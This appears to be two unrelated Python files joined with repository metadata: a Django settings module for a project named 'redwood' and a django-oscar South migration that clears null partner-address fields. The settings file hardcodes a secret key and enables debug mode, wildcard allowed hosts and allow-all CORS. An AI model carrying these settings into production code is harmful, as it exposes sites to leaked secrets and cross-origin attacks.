import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '_o^^x=d#@7ufl_g(9ef!wbz8i042gg)_9lyox!vk7p332sq_mr' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = ["*"] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'watch.apps.WatchConfig', 'accounts.apps.AccountsConfig', 'staff.apps.StaffConfig', 'rest_framework', 'rest_framework.authtoken', 'corsheaders', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', 'corsheaders.middleware.CorsMiddleware', ] CORS_ORIGIN_ALLOW_ALL = True REST_FRAMEWORK = { 'DEFAULT_AUTHENTICATION_CLASSES': ( 'rest_framework.authentication.TokenAuthentication', 'rest_framework.authentication.SessionAuthentication', ) } ROOT_URLCONF = 'redwood.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'redwood.wsgi.application' # Database # 
https://docs.djangoproject.com/en/2.1/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'mysql.connector.django', 'OPTIONS': { 'option_files': 'smile.cnf' }, } } # Password validation # https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # comment out when debug is true STATICFILES_DIRS = ( os.path.join(BASE_DIR, "redwood/static"), ) # Internationalization # https://docs.djangoproject.com/en/2.1/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'Africa/Nairobi' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.1/howto/static-files/ STATIC_URL = '/static/' MEDIA_ROOT = os.path.join(BASE_DIR, "media") MEDIA_URL = '/media/'
[ "danmburu254@gmail.com" ]
danmburu254@gmail.com
66b497a4b3bbb7bdc22d36c21f835862ef2a988e
efd517e88c1016ae23156c7efd31ef35421b00e8
/oscar/apps/partner/migrations/0012_no_null_in_charfields.py
c79c27f5415ba8b14cdf187f870ac9034bee3785
[ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "BSD-2-Clause" ]
permissive
harshadbhatia/django-oscar
2b387f002059c3b8a1dcb231384bc3d7bc6c0bad
d6b51d8719bc9f7a633c157197405ba59eb07f3b
refs/heads/master
2022-07-27T17:03:51.074089
2014-06-20T15:36:43
2014-06-20T15:36:43
21,063,503
0
0
BSD-3-Clause
2023-08-24T20:08:25
2014-06-21T07:56:14
Python
UTF-8
Python
false
false
20,661
py
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import DataMigration from django.db import models from oscar.core.compat import AUTH_USER_MODEL, AUTH_USER_MODEL_NAME class Migration(DataMigration): def forwards(self, orm): orm.PartnerAddress.objects.filter(first_name__isnull=True).update(first_name='') orm.PartnerAddress.objects.filter(title__isnull=True).update(title='') orm.PartnerAddress.objects.filter(line4__isnull=True).update(line4='') orm.PartnerAddress.objects.filter(line3__isnull=True).update(line3='') orm.PartnerAddress.objects.filter(line2__isnull=True).update(line2='') orm.PartnerAddress.objects.filter(state__isnull=True).update(state='') orm.PartnerAddress.objects.filter(postcode__isnull=True).update(postcode='') orm.Partner.objects.filter(name__isnull=True).update(name='') def backwards(self, orm): raise RuntimeError("Cannot reverse this migration.") models = { u'address.country': { 'Meta': {'ordering': "('-display_order', 'name')", 'object_name': 'Country'}, 'display_order': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'db_index': 'True'}), 'is_shipping_country': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}), 'iso_3166_1_a2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'primary_key': 'True'}), 'iso_3166_1_a3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'db_index': 'True'}), 'iso_3166_1_numeric': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'db_index': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'printable_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}) }, u'auth.group': { 'Meta': {'object_name': 'Group'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': 
('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, u'auth.permission': { 'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, AUTH_USER_MODEL: { 'Meta': {'object_name': AUTH_USER_MODEL_NAME}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}), 'username': 
('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, u'catalogue.attributeentity': { 'Meta': {'object_name': 'AttributeEntity'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}), 'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': u"orm['catalogue.AttributeEntityType']"}) }, u'catalogue.attributeentitytype': { 'Meta': {'object_name': 'AttributeEntityType'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}) }, u'catalogue.attributeoption': { 'Meta': {'object_name': 'AttributeOption'}, 'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': u"orm['catalogue.AttributeOptionGroup']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'option': ('django.db.models.fields.CharField', [], {'max_length': '255'}) }, u'catalogue.attributeoptiongroup': { 'Meta': {'object_name': 'AttributeOptionGroup'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}) }, u'catalogue.category': { 'Meta': {'ordering': "['full_name']", 'object_name': 'Category'}, 'depth': ('django.db.models.fields.PositiveIntegerField', [], {}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 
'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}), 'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}) }, u'catalogue.option': { 'Meta': {'object_name': 'Option'}, 'code': ('oscar.models.fields.autoslugfield.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '128', 'separator': "u'-'", 'blank': 'True', 'unique': 'True', 'populate_from': "'name'", 'overwrite': 'False'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'type': ('django.db.models.fields.CharField', [], {'default': "'Required'", 'max_length': '128'}) }, u'catalogue.product': { 'Meta': {'ordering': "['-date_created']", 'object_name': 'Product'}, 'attributes': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.ProductAttribute']", 'through': u"orm['catalogue.ProductAttributeValue']", 'symmetrical': 'False'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Category']", 'through': u"orm['catalogue.ProductCategory']", 'symmetrical': 'False'}), 'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_discountable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'variants'", 'null': 'True', 'to': 
u"orm['catalogue.Product']"}), 'product_class': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'products'", 'null': 'True', 'on_delete': 'models.PROTECT', 'to': u"orm['catalogue.ProductClass']"}), 'product_options': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}), 'rating': ('django.db.models.fields.FloatField', [], {'null': 'True'}), 'recommended_products': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Product']", 'symmetrical': 'False', 'through': u"orm['catalogue.ProductRecommendation']", 'blank': 'True'}), 'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'relations'", 'blank': 'True', 'to': u"orm['catalogue.Product']"}), 'score': ('django.db.models.fields.FloatField', [], {'default': '0.0', 'db_index': 'True'}), 'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'upc': ('oscar.models.fields.NullCharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}) }, u'catalogue.productattribute': { 'Meta': {'ordering': "['code']", 'object_name': 'ProductAttribute'}, 'code': ('django.db.models.fields.SlugField', [], {'max_length': '128'}), 'entity_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeEntityType']", 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'option_group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeOptionGroup']", 'null': 'True', 'blank': 'True'}), 'product_class': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'attributes'", 'null': 
'True', 'to': u"orm['catalogue.ProductClass']"}), 'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'type': ('django.db.models.fields.CharField', [], {'default': "'text'", 'max_length': '20'}) }, u'catalogue.productattributevalue': { 'Meta': {'object_name': 'ProductAttributeValue'}, 'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.ProductAttribute']"}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'attribute_values'", 'to': u"orm['catalogue.Product']"}), 'value_boolean': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}), 'value_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}), 'value_entity': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeEntity']", 'null': 'True', 'blank': 'True'}), 'value_file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'value_float': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}), 'value_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'value_integer': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'value_option': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.AttributeOption']", 'null': 'True', 'blank': 'True'}), 'value_richtext': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'value_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}) }, u'catalogue.productcategory': { 'Meta': {'ordering': "['product', 'category']", 'object_name': 'ProductCategory'}, 'category': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Category']"}), u'id': 
('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"}) }, u'catalogue.productclass': { 'Meta': {'ordering': "['name']", 'object_name': 'ProductClass'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'options': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['catalogue.Option']", 'symmetrical': 'False', 'blank': 'True'}), 'requires_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'slug': ('oscar.models.fields.autoslugfield.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '128', 'separator': "u'-'", 'blank': 'True', 'unique': 'True', 'populate_from': "'name'", 'overwrite': 'False'}), 'track_stock': ('django.db.models.fields.BooleanField', [], {'default': 'True'}) }, u'catalogue.productrecommendation': { 'Meta': {'object_name': 'ProductRecommendation'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'primary': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'primary_recommendations'", 'to': u"orm['catalogue.Product']"}), 'ranking': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}), 'recommendation': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['catalogue.Product']"}) }, u'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, u'partner.partner': { 'Meta': {'object_name': 
'Partner'}, 'code': ('oscar.models.fields.autoslugfield.AutoSlugField', [], {'allow_duplicates': 'False', 'max_length': '128', 'separator': "u'-'", 'blank': 'True', 'unique': 'True', 'populate_from': "'name'", 'overwrite': 'False'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}), 'users': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'partners'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['{0}']".format(AUTH_USER_MODEL)}) }, u'partner.partneraddress': { 'Meta': {'object_name': 'PartnerAddress'}, 'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['address.Country']"}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'line1': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'line2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'line3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'line4': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'partner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'addresses'", 'to': u"orm['partner.Partner']"}), 'postcode': ('oscar.models.fields.UppercaseCharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}), 'search_text': ('django.db.models.fields.CharField', [], {'max_length': '1000'}), 'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 
'blank': 'True'}) }, u'partner.stockalert': { 'Meta': {'ordering': "('-date_created',)", 'object_name': 'StockAlert'}, 'date_closed': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '128'}), 'stockrecord': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'alerts'", 'to': u"orm['partner.StockRecord']"}), 'threshold': ('django.db.models.fields.PositiveIntegerField', [], {}) }, u'partner.stockrecord': { 'Meta': {'unique_together': "(('partner', 'partner_sku'),)", 'object_name': 'StockRecord'}, 'cost_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}), 'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}), 'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'low_stock_threshold': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}), 'num_allocated': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'num_in_stock': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}), 'partner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stockrecords'", 'to': u"orm['partner.Partner']"}), 'partner_sku': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'price_currency': ('django.db.models.fields.CharField', [], {'default': "'GBP'", 'max_length': '12'}), 'price_excl_tax': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 
'decimal_places': '2', 'blank': 'True'}), 'price_retail': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'stockrecords'", 'to': u"orm['catalogue.Product']"}) } } complete_apps = ['partner'] symmetrical = True
[ "m@maikhoepfel.de" ]
m@maikhoepfel.de